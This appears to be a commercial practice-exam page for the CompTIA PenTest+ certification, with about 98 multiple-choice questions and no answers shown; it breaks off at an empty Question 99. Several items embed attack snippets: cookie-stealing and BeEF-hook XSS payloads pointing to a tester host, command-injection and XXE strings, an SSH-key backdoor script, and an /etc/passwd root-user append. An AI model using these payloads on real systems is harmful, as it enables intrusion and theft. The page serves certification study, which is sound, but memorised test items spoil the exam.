Weekend Sale Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 70percent

CompTIA PT0-003 CompTIA PenTest+ Exam Exam Practice Test

Demo: 100 questions
Total 336 questions

CompTIA PenTest+ Exam Questions and Answers

Question 1

A penetration tester must identify hosts without alerting an IPS. The tester has access to a local network segment. Which of the following is the most logical action?

Options:

A.

Performing reverse DNS lookups

B.

Utilizing Nmap using a ping sweep

C.

Conducting LLMNR poisoning using Responder

D.

Viewing the local routing table on the host

Question 2

A penetration tester cannot complete a full vulnerability scan because the client ' s WAF is blocking communications. During which of the following activities should the penetration tester discuss this issue with the client?

Options:

A.

Goal reprioritization

B.

Peer review

C.

Client acceptance

D.

Stakeholder alignment

Question 3

During the reconnaissance phase, a penetration tester collected the following information from the DNS records:

A----- > www

A----- > host

TXT -- > vpn.comptia.org

SPF--- > ip =2.2.2.2

Which of the following DNS records should be in place to avoid phishing attacks using spoofing domain techniques?

Options:

A.

MX

B.

SOA

C.

DMARC

D.

CNAME

Question 4

A penetration tester compromises a Windows OS endpoint that is joined to an Active Directory local environment. Which of the following tools should the tester use to manipulate authentication mechanisms to move laterally in the network?

Options:

A.

Rubeus

B.

WinPEAS

C.

NTLMRelayX

D.

Impacket

Question 5

Which of the following components of a penetration test report most directly contributes to prioritizing remediations?

Options:

A.

Proof of concept

B.

Risk scoring

C.

Attack narrative

D.

Executive summary

Question 6

A penetration tester wants to maintain access to a compromised system after a reboot. Which of the following techniques would be best for the tester to use?

Options:

A.

Establishing a reverse shell

B.

Executing a process injection attack

C.

Creating a scheduled task

D.

Performing a credential-dumping attack

Question 7

You are a penetration tester reviewing a client’s website through a web browser.

INSTRUCTIONS

Review all components of the website through the browser to determine if vulnerabilities are present.

Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Question 8

A penetration tester conducts a web application assessment and receives the following Set-Cookie upon logging in:

Set-Cookie auth=UGVudGVzdFVzZXI6OTE1MzYK

Upon analysis, the penetration tester determines this is a Base64-encoded string, which when decoded reads:

Pentestuser:91536

The penetration tester logs out, logs back in, and sees the decoded string now reads:

Pentestuser:91944

Which of the following attacks will the penetration tester most likely conduct based on this information?

Options:

A.

Collision attack

B.

JWT manipulation

C.

Session hijacking

D.

Insecure direct object reference

Question 9

During an assessment, a penetration tester obtains access to a Microsoft SQL server using sqlmap and runs the following command:

sql > xp_cmdshell whoami /all

Which of the following is the tester trying to do?

Options:

A.

List database tables

B.

Show logged-in database users

C.

Enumerate privileges

D.

Display available SQL commands

Question 10

A penetration tester downloads a JAR file that is used in an organization ' s production environment. The tester evaluates the contents of the JAR file to identify potentially vulnerable components that can be targeted for exploit. Which of the following describes the tester ' s activities?

Options:

A.

SAST

B.

SBOM

C.

ICS

D.

SCA

Question 11

During an assessment, a penetration tester wants to extend the vulnerability search to include the use of dynamic testing. Which of the following tools should the tester use?

Options:

A.

Mimikatz

B.

ZAP

C.

OllyDbg

D.

SonarQube

Question 12

A penetration tester needs to launch an Nmap scan to find the state of the port for both TCP and UDP services. Which of the following commands should the tester use?

Options:

A.

nmap -sU -sW -p 1-65535 example.com

B.

nmap -sU -sY -p 1-65535 example.com

C.

nmap -sU -sT -p 1-65535 example.com

D.

nmap -sU -sN -p 1-65535 example.com

Question 13

A penetration tester cannot find information on the target company ' s systems using common OSINT methods. The tester ' s attempts to do reconnaissance against internet-facing resources have been blocked by the company ' s WAF. Which of the following is the best way to avoid the WAF and gather information about the target company ' s systems?

Options:

A.

HTML scraping

B.

Code repository scanning

C.

Directory enumeration

D.

Port scanning

Question 14

Which of the following post-exploitation activities allows a penetration tester to maintain persistent access in a compromised system?

Options:

A.

Creating registry keys

B.

Installing a bind shell

C.

Executing a process injection

D.

Setting up a reverse SSH connection

Question 15

During an assessment, a penetration tester plans to gather metadata from various online files, including pictures. Which of the following standards outlines the formats for pictures, audio, and additional tags that facilitate this type of reconnaissance?

Options:

A.

EXIF

B.

GIF

C.

COFF

D.

ELF

Question 16

A penetration tester is performing a network security assessment. The tester wants to intercept communication between two users and then view and potentially modify transmitted data. Which of the following types of on-path attacks would be best to allow the penetration tester to achieve this result?

Options:

A.

DNS spoofing

B.

ARP poisoning

C.

VLAN hopping

D.

SYN flooding

Question 17

A penetration tester is researching a path to escalate privileges. While enumerating current user privileges, the tester observes the following:

SeAssignPrimaryTokenPrivilege Disabled

SeIncreaseQuotaPrivilege Disabled

SeChangeNotifyPrivilege Enabled

SeManageVolumePrivilege Enabled

SeImpersonatePrivilege Enabled

SeCreateGlobalPrivilege Enabled

SeIncreaseWorkingSetPrivilege Disabled

Which of the following privileges should the tester use to achieve the goal?

Options:

A.

SeImpersonatePrivilege

B.

SeCreateGlobalPrivilege

C.

SeChangeNotifyPrivilege

D.

SeManageVolumePrivilege

Question 18

A penetration tester is working on an engagement in which a main objective is to collect confidential information that could be used to exfiltrate data and perform a ransomware attack. During the engagement, the tester is able to obtain an internal foothold on the target network. Which of the following is the next task the tester should complete to accomplish the objective?

Options:

A.

Initiate a social engineering campaign.

B.

Perform credential dumping.

C.

Compromise an endpoint.

D.

Share enumeration.

Question 19

A tester obtains access to an endpoint subnet and wants to move laterally in the network. Given the following output:

kotlin

Copy code

Nmap scan report for some_host

Host is up (0.01 latency).

PORT STATE SERVICE

445/tcp open microsoft-ds

Host script results: smb2-security-mode: Message signing disabled

Which of the following command and attack methods is the most appropriate for reducing the chances of being detected?

Options:

A.

responder -T eth0 -dwv ntlmrelayx.py -smb2support -tf < target >

B.

msf > use exploit/windows/smb/ms17_010_psexec msf > < set options > msf > run

C.

hydra -L administrator -P /path/to/passwdlist smb:// < target >

D.

nmap —script smb-brute.nse -p 445 < target >

Question 20

Which of the following activities should be performed to prevent uploaded web shells from being exploited by others?

Options:

A.

Removing persistence mechanisms

B.

Uninstalling tools

C.

Preserving artifacts

D.

Reverting configuration changes

Question 21

During a penetration test, a tester has confirmed stored XSS within a comment form on a site. Which of the following payloads is required to exploit the vulnerability and provide a reverse shell against user browsers?

Options:

A.

Use Evilginx and insert payload < img src= " http:// < tester-IP > /?f ' document.cookie+ ' "

B.

Use BeEF and insert payload < script src= " http:// < tester-IP > :3000/hook.js " >

C.

Use Netcat listener and insert payload < iframe src=http:// < tester-IP > /../../bin/bash >

D.

Use Metasploit post/firefox/gather/xss and insert payload < img src= " http:// < tester-IP > "

Question 22

A penetration tester is conducting an assessment of offline systems that control a power plant. The tester is looking for vulnerabilities observable in the network stack. The rules of engagement state that the tester cannot interact with production systems. Which of the following tools or techniques should the tester use for the assessment?

Options:

A.

Port mirroring

B.

Storyboarding

C.

Write blocker

D.

SAST tool

Question 23

A penetration tester has just started a new engagement. The tester is using a framework that breaks the life cycle into 14 components. Which of the following frameworks is the tester using?

Options:

A.

OWASP MASVS

B.

OSSTMM

C.

MITRE ATT & CK

D.

CREST

Question 24

A tester gains initial access to a server and needs to enumerate all corporate domain DNS records. Which of the following commands should the tester use?

Options:

A.

dig +short A AAAA local.domain

B.

nslookup local.domain

C.

dig axfr @local.dns.server

D.

nslookup -server local.dns.server local.domain *

Question 25

Which of the following elements in a lock should be aligned to a specific level to allow the key cylinder to turn?

Options:

A.

Latches

B.

Pins

C.

Shackle

D.

Plug

Question 26

A tester conducts a web application penetration test and discovers a hidden diagnostics page. The hidden diagnostics page allows a user to ping other systems and test connectivity. Which of the following payloads is best suited to test this function?

Options:

A.

; whoami ; ps aux

B.

< script > alert(1) < /script >

C.

' SELECT @@version --

D.

../../../../../../etc/passwd

Question 27

A penetration tester obtains local administrator access on a Windows system and wants to attempt lateral movement. The system exists within a Windows Workgroup environment. Which of the following actions should the tester take?

Options:

A.

Create a malicious certificate.

B.

Dump credentials from memory.

C.

Craft Kerberos tickets.

D.

List potential privilege escalation paths.

Question 28

A penetration tester is performing an authorized physical assessment. During the test, the tester observes an access control vestibule and on-site security guards near the entry door in the lobby. Which of the following is the best attack plan for the tester to use in order to gain access to the facility?

Options:

A.

Clone badge information in public areas of the facility to gain access to restricted areas.

B.

Tailgate into the facility during a very busy time to gain initial access.

C.

Pick the lock on the rear entrance to gain access to the facility and try to gain access.

D.

Drop USB devices with malware outside of the facility in order to gain access to internal machines.

Question 29

A penetration tester reviews the following output:

PORT STATE SERVICE VERSION

21/tcp open ftp

22/tcp open ssh OpenSSH 9.9p2 Debian 1 (protocol 2.0)

25/tcp open smtp Microsoft IIS httpd 10.0

53/tcp open domain?

88/tcp open kerberos-sec

389/tcp open ldap

442/tcp open https

445/tcp open microsoft-ds

3389/tcp open ms-wbt-server Microsoft Terminal Services

3128/tcp open squid-http

Additional fingerprint strings include references to:

Target name: K8MA

NetBIOS Domain Name: K8MA

DNS Domain Name: K8MA.LOCAL

Which of the following most likely describes the function of this system?

Options:

A.

Enterprise mail server

B.

Honeypot

C.

Stand-alone web server

D.

Domain Controller

Question 30

During wireless testing, a penetration tester observes the following customer APs and configurations:

SSID / Configuration

AP1 – WPA3

AP2 – WPA3

AP3 – WPA2

AP4 – WPA3

Which of the following attacks can the tester use only against AP3?

Options:

A.

Brute force

B.

Signal jamming

C.

Evil twin

D.

Deauthentication

Question 31

Which of the following can an access control vestibule help deter?

Options:

A.

USB drops

B.

Badge cloning

C.

Lock picking

D.

Tailgating

Question 32

A penetration tester discovers evidence of an advanced persistent threat on the network that is being tested. Which of the following should the tester do next?

Options:

A.

Report the finding.

B.

Analyze the finding.

C.

Remove the threat.

D.

Document the finding and continue testing.

Question 33

A penetration tester needs to quickly transfer an exploit from a Linux system to a Windows 10 system within the network. Which of the following is the best way to accomplish this task?

Options:

A.

nc -lvp 8080

B.

nc -lnvp 443

C.

python3 -m http.server 80

D.

ncat -lvp 9090

Question 34

A tester compromises a target host and then wants to maintain persistent access. Which of the following is the best way for the attacker to accomplish the objective?

Options:

A.

Configure and register a service.

B.

Install and run remote desktop software.

C.

Set up a script to be run when users log in.

D.

Perform a kerberoasting attack on the host.

Question 35

A penetration tester has been asked to conduct a blind web application test against a customer ' s corporate website. Which of the following tools would be best suited to perform this assessment?

Options:

A.

ZAP

B.

Nmap

C.

Wfuzz

D.

Trufflehog

Question 36

A company ' s incident response team determines that a breach occurred because a penetration tester left a web shell. Which of the following should the penetration tester have done after the engagement?

Options:

A.

Enable a host-based firewall on the machine

B.

Remove utilized persistence mechanisms on client systems

C.

Revert configuration changes made during the engagement

D.

Turn off command-and-control infrastructure

Question 37

A penetration tester completes a scan and sees the following output on a host:

bash

Copy code

Nmap scan report for victim (10.10.10.10)

Host is up (0.0001s latency)

PORT STATE SERVICE

161/udp open|filtered snmp

445/tcp open microsoft-ds

3389/tcp open microsoft-ds

Running Microsoft Windows 7

OS CPE: cpe:/o:microsoft:windows_7_sp0

The tester wants to obtain shell access. Which of the following related exploits should the tester try first?

Options:

A.

exploit/windows/smb/psexec

B.

exploit/windows/smb/ms08_067_netapi

C.

exploit/windows/smb/ms17_010_eternalblue

D.

auxiliary/scanner/snmp/snmp_login

Question 38

During a security assessment of an e-commerce website, a penetration tester wants to exploit a vulnerability in the web server’s input validation that will allow unauthorized transactions on behalf of the user. Which of the following techniques would most likely be used for that purpose?

Options:

A.

Privilege escalation

B.

DOM injection

C.

Session hijacking

D.

Cross-site scripting

Question 39

A penetration tester is attempting to discover vulnerabilities in a company ' s web application. Which of the following tools would most likely assist with testing the security of the web application?

Options:

A.

OpenVAS

B.

Nessus

C.

sqlmap

D.

Nikto

Question 40

A penetration tester plans to conduct reconnaissance during an engagement using readily available resources. Which of the following resources would most likely identify hardware and software being utilized by the client?

Options:

A.

Cryptographic flaws

B.

Protocol scanning

C.

Cached pages

D.

Job boards

Question 41

A penetration tester is performing an assessment focused on attacking the authentication identity provider hosted within a cloud provider. During the reconnaissance phase, the tester finds that the system is using OpenID Connect with OAuth and has dynamic registration enabled. Which of the following attacks should the tester try first?

Options:

A.

A password-spraying attack against the authentication system

B.

A brute-force attack against the authentication system

C.

A replay attack against the authentication flow in the system

D.

A mask attack against the authentication system

Question 42

A tester wants to pivot from a compromised host to another network with encryption and the least amount of interaction with the compromised host. Which of the following is the best way to accomplish this objective?

Options:

A.

Create an SSH tunnel using sshuttle to forward all the traffic to the compromised computer.

B.

Configure a VNC server on the target network and access the VNC server from the compromised computer.

C.

Set up a Metasploit listener on the compromised computer and create a reverse shell on the target network.

D.

Create a Netcat connection to the compromised computer and forward all the traffic to the target network.

Question 43

A penetration tester identifies an exposed corporate directory containing first and last names and phone numbers for employees. Which of the following attack techniques would be the most effective to pursue if the penetration tester wants to compromise user accounts?

Options:

A.

Smishing

B.

Impersonation

C.

Tailgating

D.

Whaling

Question 44

A penetration tester needs to help create a threat model of a custom application. Which of the following is the most likely framework the tester will use?

Options:

A.

MITRE ATT & CK

B.

OSSTMM

C.

CI/CD

D.

DREAD

Question 45

Which of the following components should a penetration tester include in the final assessment report?

Options:

A.

User activities

B.

Customer remediation plan

C.

Key management

D.

Attack narrative

Question 46

A penetration tester has adversely affected a critical system during an engagement, which could have a material impact on the organization. Which of the following should the penetration tester do to address this issue?

Options:

A.

Restore the configuration.

B.

Perform a BIA.

C.

Follow the escalation process.

D.

Select the target.

Question 47

A penetration tester receives the following output when enumerating a local user:

User compromised_user may run the following commands on localhost:

root (NO PASSWD): /bin/vim

The tester suspects that another host on the same subnet is also vulnerable. Which of the following is the best method to validate whether the other host is vulnerable?

Options:

A.

ssh compromised_user@victimhost " vim; echo $? "

B.

ssh compromised_user@victimhost " sudo -l "

C.

ssh compromised_user@victimhost " bash -c vim "

D.

ssh compromised_user@victimhost " ls -lah /bin/vim "

Question 48

During an engagement, a penetration tester discovers a web application vulnerability that affects multiple devices. The tester creates and runs the following script:

#!/bin/sh

for addr in $(cat targets)

do

curl http://$addr//atod.php?execf=echo%20%22ssh-ed25519%20AAAC3NzaC1lZDI1NTE5AAAA...%22%20%3E%3E%20/root/authorized_users

done

Which of the following best describes what the tester is attempting to do?

Options:

A.

Staging payloads to make bind shells

B.

Creating a backdoor on several weak targets

C.

Adding a password for the root user on the targets

D.

Generating SSH keys to decrypt data on each target

Question 49

A penetration tester wants to automatically enumerate all ciphers permitted on TLS/SSL configurations across a client’s internet-facing and internal web servers. Which of the following tools or frameworks best supports this objective?

Options:

A.

Nmap Scripting Engine

B.

Shodan

C.

Impacket

D.

Netcat

E.

Burp Suite

Question 50

Which of the following is a term used to describe a situation in which a penetration tester bypasses physical access controls and gains access to a facility by entering at the same time as an employee?

Options:

A.

Badge cloning

B.

Shoulder surfing

C.

Tailgating

D.

Site survey

Question 51

Which of the following explains the reason a tester would opt to use DREAD over PTES during the planning phase of a penetration test?

Options:

A.

The tester is conducting a web application test.

B.

The tester is assessing a mobile application.

C.

The tester is evaluating a thick client application.

D.

The tester is creating a threat model.

Question 52

A penetration tester completed OSINT work and needs to identify all subdomains for mydomain.com. Which of the following is the best command for the tester to use?

Options:

A.

nslookup mydomain.com » /path/to/results.txt

B.

crunch 1 2 | xargs -n 1 -I ' X ' nslookup X.mydomain.com

C.

dig @8.8.8.8 mydomain.com ANY » /path/to/results.txt

D.

cat wordlist.txt | xargs -n 1 -I ' X ' dig X.mydomain.com

Question 53

A penetration tester finishes a security scan and uncovers numerous vulnerabilities on several hosts. Based on the targets ' EPSS (Exploit Prediction Scoring System) and CVSS (Common Vulnerability Scoring System) scores, which of the following targets is the most likely to get attacked?

Options:

A.

Target 1: EPSS Score = 0.6, CVSS Score = 4

B.

Target 2: EPSS Score = 0.3, CVSS Score = 2

C.

Target 3: EPSS Score = 0.6, CVSS Score = 1

D.

Target 4: EPSS Score = 0.4, CVSS Score = 4.5

Question 54

During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.

INSTRUCTIONS

Analyze the code segments to determine which sections are needed to complete a port scanning script.

Drag the appropriate elements into the correct locations to complete the script.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Question 55

During an assessment on a client that uses virtual desktop infrastructure in the cloud, a penetration tester gains access to a host and runs commands. The penetration tester receives the following output:

-rw-r--r-- 1 comptiauser comptiauser 807 Apr 6 05:32 .profile

drwxr-xr-x 2 comptiauser comptiauser 4096 Apr 6 05:32 .ssh

-rw-r--r-- 1 comptiauser comptiauser 3526 Apr 6 05:32 .bashrc

drwxr-xr-x 4 comptiauser comptiauser 4096 May 12 11:05 .aws

-rw-r--r-- 1 comptiauser comptiauser 1325 Aug 21 19:54 .zsh_history

drwxr-xr-x 12 comptiauser comptiauser 4096 Aug 27 14:10 Documents

drwxr-xr-x 16 comptiauser comptiauser 4096 Aug 27 14:10 Desktop

drwxr-xr-x 2 comptiauser comptiauser 4096 Aug 27 14:10 Downloads

Which of the following should the penetration tester investigate first?

Options:

A.

Documents

B.

.zsh_history

C.

.aws

D.

.ssh

Question 56

A penetration tester finds it is possible to downgrade a web application ' s HTTPS connections to HTTP while performing on-path attacks on the local network. The tester reviews the output of the server response to:

curl -s -i https://internalapp/

HTTP/2 302

date: Thu, 11 Jan 2024 15:56:24 GMT

content-type: text/html; charset=iso-8659-1

location: /login

x-content-type-options: nosniff

server: Prod

Which of the following recommendations should the penetration tester include in the report?

Options:

A.

Add the HSTS header to the server.

B.

Attach the httponly flag to cookies.

C.

Front the web application with a firewall rule to block access to port 80.

D.

Remove the x-content-type-options header.

Question 57

You are a penetration tester running port scans on a server.

INSTRUCTIONS

Part 1: Given the output, construct the command that was used to generate this output from the available options.

Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Question 58

A penetration tester is performing a security review of a web application. Which of the following should the tester leverage to identify the presence of vulnerable open-source libraries?

Options:

A.

VM

B.

IAST

C.

DAST

D.

SCA

Question 59

A penetration tester is conducting a vulnerability scan. The tester wants to see any vulnerabilities that may be visible from outside of the organization. Which of the following scans should the penetration tester perform?

Options:

A.

SAST

B.

Sidecar

C.

Unauthenticated

D.

Host-based

Question 60

openssl passwd password

$1$OjxLvZ85$Fdr51vn/Z4zXWsQR/Xrj.

The tester then adds the following line to the world-writable script:

echo ' root2:$1$0jxLvZ85$Fdr51vn/Z4zXWsQR/Xrj .: 1001:1001:,,,:/root:/bin/bash " > > /etc/passwd

Which of the following should the penetration tester do to enable this exploit to work correctly?

Options:

A.

Use only a single redirect to /etc/password.

B.

Generate the password using md5sum.

C.

Log in to the host using SSH.

D.

Change the 1001 entries to 0.

Question 61

Which of the following OT protocols sends information in cleartext?

Options:

A.

TTEthernet

B.

DNP3

C.

Modbus

D.

PROFINET

Question 62

A penetration tester established an initial compromise on a host. The tester wants to pivot to other targets and set up an appropriate relay. The tester needs to enumerate through the compromised host as a relay from the tester ' s machine. Which of the following commands should the tester use to do this task from the tester ' s host?

Options:

A.

attacker_host$ nmap -sT < target_cidr > | nc -n < compromised_host > 22

B.

attacker_host$ mknod backpipe p attacker_host$ nc -l -p 8000 | 0 < backpipe | nc < target_cidr > 80 | tee backpipe

C.

attacker_host$ nc -nlp 8000 | nc -n < target_cidr > attacker_host$ nmap -sT 127.0.0.1 8000

D.

attacker_host$ proxychains nmap -sT < target_cidr >

Question 63

During an assessment, a penetration tester gains a low-privilege shell and then runs the following command:

findstr /SIM /C: " pass " *.txt *.cfg *.xml

Which of the following is the penetration tester trying to enumerate?

Options:

A.

Configuration files

B.

Permissions

C.

Virtual hosts

D.

Secrets

Question 64

A penetration tester discovers a deprecated directory in which files are accessible to anyone. Which of the following would most likely assist the penetration tester in finding sensitive information without raising suspicion?

Options:

A.

Enumerating cached pages available on web pages

B.

Looking for externally available services

C.

Scanning for exposed ports associated with the domain

D.

Searching for vulnerabilities and potential exploits

Question 65

During a penetration test, a tester attempts to pivot from one Windows 10 system to another Windows system. The penetration tester thinks a local firewall is blocking connections. Which of the following command-line utilities built into Windows is most likely to disable the firewall?

Options:

A.

certutil.exe

B.

bitsadmin.exe

C.

msconfig.exe

D.

netsh.exe

Question 66

Which of the following is the most likely LOLBin to be used to perform an exfiltration on a Microsoft Windows environment?

Options:

A.

procdump.exe

B.

msbuild.exe

C.

bitsadmin.exe

D.

cscript.exe

Question 67

A penetration tester performs several Nmap scans against the web application for a client.

INSTRUCTIONS

Click on the WAF and servers to review the results of the Nmap scans. Then click on

each tab to select the appropriate vulnerability and remediation options.

If at any time you would like to bring back the initial state of the simulation, please

click the Reset All button.

Options:

Question 68

A penetration tester completes an authenticated vulnerability scan of a host and receives the following results:

Line 1: 10.1.10.127 resolves to comptia.foo.local

Line 2: FOUND ports 445, 3389 TCP open

Line 3: OS Fingerprint 70% confidence Windows 7 SP0

Line 4: SMB signing is disabled

Line 5: Scan Complete.

Which of the following is most likely to cause stability issues when a session is created on a target machine?

Options:

A.

Running Responder with default settings and using Impacket

B.

Running Nmap with safe scripts enabled and targeting RDP

C.

Running Metasploit utilizing the EternalBlue module

D.

Running Hydra on the local user at one attempt per second

Question 69

A penetration testing team needs to determine whether it is possible to disrupt wireless communications for PCs deployed in the client’s offices. Which of the following techniques should the penetration tester leverage?

Options:

A.

Port mirroring

B.

Sidecar scanning

C.

ARP poisoning

D.

Channel scanning

Question 70

In a cloud environment, a security team discovers that an attacker accessed confidential information that was used to configure virtual machines during their initialization. Through which of the following features could this information have been accessed?

Options:

A.

IAM

B.

Block storage

C.

Virtual private cloud

D.

Metadata services

Question 71

During a security assessment, a penetration tester uses a tool to capture plaintext log-in credentials on the communication between a user and an authentication system. The tester wants to use this information for further unauthorized access. Which of the following tools is the tester using?

Options:

A.

Burp Suite

B.

Wireshark

C.

Zed Attack Proxy

D.

Metasploit

Question 72

A penetration tester finds that an application responds with the contents of the /etc/passwd file when the following payload is sent:

< ?xml version= " 1.0 " ? >

< !DOCTYPE data [ < !ENTITY foo SYSTEM " file:///etc/passwd " > ] >

< test > & foo; < /test >

Which of the following should the tester recommend in the report to best prevent this type of vulnerability?

Options:

A.

Drop all excessive file permissions with chmod o-rwx

B.

Ensure the requests application access logs are reviewed frequently

C.

Disable the use of external entities

D.

Implement a WAF to filter all incoming requests

Question 73

A penetration tester conducts a scan on an exposed Linux web server and gathers the following data:

Host: 192.168.55.23

Open Ports:

22/tcp Open OpenSSH 7.2p2 Ubuntu 4ubuntu2.10

80/tcp Open Apache httpd 2.4.18 (Ubuntu)

111/tcp Open rpcbind 2-4 (RPC #100000)

Additional notes:

Directory listing enabled on /admin

Apache mod_cgi enabled

No authentication required to access /cgi-bin/debug.sh

X-Powered-By: PHP/5.6.40-0+deb8u12

Which of the following is the most effective action to take?

Options:

A.

Launch a payload using msfvenom and upload it to the /admin directory.

B.

Review the contents of /cgi-bin/debug.sh.

C.

Use Nikto to scan the host and port 80.

D.

Attempt a brute-force attack against OpenSSH 7.2p2.

Question 74

A penetration tester wants to check the security awareness of specific workers in the company with targeted attacks. Which of the following attacks should the penetration tester perform?

Options:

A.

Phishing

B.

Tailgating

C.

Whaling

D.

Spear phishing

Question 75

While conducting a reconnaissance activity, a penetration tester extracts the following information:

Emails:

admin@acme.com

sales@acme.com

support@acme.com

Which of the following risks should the tester use to leverage an attack as the next step in the security assessment?

Options:

A.

Unauthorized access to the network

B.

Exposure of sensitive servers to the internet

C.

Likelihood of SQL injection attacks

D.

Indication of a data breach in the company

Question 76

Which of the following is the most efficient way to infiltrate a file containing data that could be sensitive?

Options:

A.

Use steganography and send the file over FTP

B.

Compress the file and send it using TFTP

C.

Split the file in tiny pieces and send it over dnscat

D.

Encrypt and send the file over HTTPS

Question 77

A penetration tester modifies a web application’s URL by inserting malformed data into input parameters. The web application returns the error message below:

Internal Server Error

NumberFormatException: For input string ...

Source file: /home/www/htmldoc/app001/140612/main

Which of the following actions will the tester most likely take?

Options:

A.

Perform application dynamic testing.

B.

Tamper with the application’s log files.

C.

Force a remote memory overflow.

D.

Exploit SQL injection vulnerabilities.

Question 78

While performing a penetration testing exercise, a tester executes the following command:

bash

Copy code

PS c:\tools > c:\hacks\PsExec.exe \\server01.comptia.org -accepteula cmd.exe

Which of the following best explains what the tester is trying to do?

Options:

A.

Test connectivity using PSExec on the server01 using CMD.exe.

B.

Perform a lateral movement attack using PsExec.

C.

Send the PsExec binary file to the server01 using CMD.exe.

D.

Enable CMD.exe on the server01 through PsExec.

Question 79

A penetration tester successfully gains access to a Linux system and then uses the following command:

find / -type f -ls > /tmp/recon.txt

Which of the following best describes the tester’s goal?

Options:

A.

Permission enumeration

B.

Secrets enumeration

C.

User enumeration

D.

Service enumeration

Question 80

A penetration tester needs to test a very large number of URLs for public access. Given the following code snippet:

1 import requests

2 import pathlib

3

4 for url in pathlib.Path( " urls.txt " ).read_text().split( " \n " ):

5 response = requests.get(url)

6 if response.status == 401:

7 print( " URL accessible " )

Which of the following changes is required?

Options:

A.

The condition on line 6

B.

The method on line 5

C.

The import on line 1

D.

The delimiter in line 3

Question 81

A penetration tester needs to evaluate the order in which the next systems will be selected for testing. Given the following output:

Which of the following targets should the tester select next?

Options:

A.

fileserver

B.

hrdatabase

C.

legaldatabase

D.

financesite

Question 82

Before starting an assessment, a penetration tester needs to scan a Class B IPv4 network for open ports in a short amount of time. Which of the following is the best tool for this task?

Options:

A.

Burp Suite

B.

masscan

C.

Nmap

D.

hping

Question 83

A penetration tester wants to use multiple TTPs to assess the reactions (alerted, blocked, and others) by the client’s current security tools. The threat-modeling team indicates the TTPs in the list might affect their internal systems and servers. Which of the following actions would the tester most likely take?

Options:

A.

Use a BAS tool to test multiple TTPs based on the input from the threat-modeling team.

B.

Perform an internal vulnerability assessment with credentials to review the internal attack surface.

C.

Use a generic vulnerability scanner to test the TTPs and review the results with the threat-modeling team.

D.

Perform a full internal penetration test to review all the possible exploits that could affect the systems.

Question 84

A penetration tester discovers exposed cloud storage buckets and needs to access the contents. Which of the following should the tester do?

Options:

A.

Protocol fingerprinting

B.

Credential brute forcing

C.

Service discovery

D.

Secrets enumeration

Question 85

A penetration tester has been provided with only the public domain name and must enumerate additional information for the public-facing assets.

INSTRUCTIONS

Select the appropriate answer(s), given the output from each section.

Output 1

Options:

Question 86

A penetration tester needs to scan a remote infrastructure with Nmap. The tester issues the following command:

nmap 10.10.1.0/24

Which of the following is the number of TCP ports that will be scanned?

Options:

A.

256

B.

1,000

C.

1,024

D.

65,535

Question 87

During a web application assessment, a penetration tester identifies an input field that allows JavaScript injection. The tester inserts a line of JavaScript that results in a prompt, presenting a text box when browsing to the page going forward. Which of the following types of attacks is this an example of?

Options:

A.

SQL injection

B.

SSRF

C.

XSS

D.

Server-side template injection

Question 88

A penetration tester is unable to identify the Wi-Fi SSID on a client’s cell phone.

Which of the following techniques would be most effective to troubleshoot this issue?

Options:

A.

Sidecar scanning

B.

Channel scanning

C.

Stealth scanning

D.

Static analysis scanning

Question 89

A penetration tester wants to gather the names of potential phishing targets who have access to sensitive data. Which of the following would best meet this goal?

Options:

A.

WHOIS

B.

Censys.io

C.

SpiderFoot

D.

theHarvester

Question 90

During an assessment, a penetration tester obtains an NTLM hash from a legacy Windows machine. Which of the following tools should the penetration tester use to continue the attack?

Options:

A.

Responder

B.

Hydra

C.

BloodHound

D.

CrackMapExec

Question 91

A penetration tester writes a Bash script to automate the execution of a ping command on a Class C network:

bash

for var in —MISSING TEXT—

do

ping -c 1 192.168.10.$var

done

Which of the following pieces of code should the penetration tester use in place of the —MISSING TEXT— placeholder?

Options:

A.

crunch 1 254 loop

B.

seq 1 254

C.

echo 1-254

D.

{1.-254}

Question 92

While conducting an assessment, a penetration tester identifies details for several unreleased products announced at a company-wide meeting.

Which of the following attacks did the tester most likely use to discover this information?

Options:

A.

Eavesdropping

B.

Bluesnarfing

C.

Credential harvesting

D.

SQL injection attack

Question 93

Which of the following techniques is the best way to avoid detection by data loss prevention tools?

Options:

A.

Encoding

B.

Compression

C.

Encryption

D.

Obfuscation

Question 94

A penetration tester aims to exploit a vulnerability in a wireless network that lacks proper encryption. The lack of proper encryption allows malicious content to infiltrate the network. Which of the following techniques would most likely achieve the goal?

Options:

A.

Packet injection

B.

Bluejacking

C.

Beacon flooding

D.

Signal jamming

Question 95

A penetration tester writes the following script to enumerate a /24 network:

1 #!/bin/bash

2 for i in {1..254}

3 ping -c1 192.168.1.$i

4 done

The tester executes the script, but it fails with the following error:

-bash: syntax error near unexpected token ' ping '

Which of the following should the tester do to fix the error?

Options:

A.

Add do after line 2

B.

Replace {1..254} with $(seq 1 254)

C.

Replace bash with zsh

D.

Replace $i with ${i}

Question 96

A tester is performing an external phishing assessment on the top executives at a company. Two-factor authentication is enabled on the executives’ accounts that are in the scope of work. Which of the following should the tester do to get access to these accounts?

Options:

A.

Configure an external domain using a typosquatting technique. Configure Evilginx to bypass two-factor authentication using a phishlet that simulates the mail portal for the company.

B.

Configure Gophish to use an external domain. Clone the email portal web page from the company and get the two-factor authentication code using a brute-force attack method.

C.

Configure an external domain using a typosquatting technique. Configure SET to bypass two-factor authentication using a phishlet that mimics the mail portal for the company.

D.

Configure Gophish to use an external domain. Clone the email portal web page from the company and get the two-factor authentication code using a vishing method.

Question 97

During a penetration test, the tester uses a vulnerability scanner to collect information about any possible vulnerabilities that could be used to compromise the network. The tester receives the results and then executes the following command:

snmpwalk -v 2c -c public 192.168.1.23

Which of the following is the tester trying to do based on the command they used?

Options:

A.

Bypass defensive systems to collect more information.

B.

Use an automation tool to perform the attacks.

C.

Script exploits to gain access to the systems and host.

D.

Validate the results and remove false positives.

Question 98

Testing and reporting activities are complete. A penetration tester needs to verify that exploited systems have been restored to preengagement conditions. Which of the following would be most appropriate for the tester to do?

Options:

A.

Terminate the running command-and-control payload.

B.

Provide the customer with a list of the changes made.

C.

Replace environment variables with their original values.

D.

Put in a change request ticket to reimage the system.

Question 99

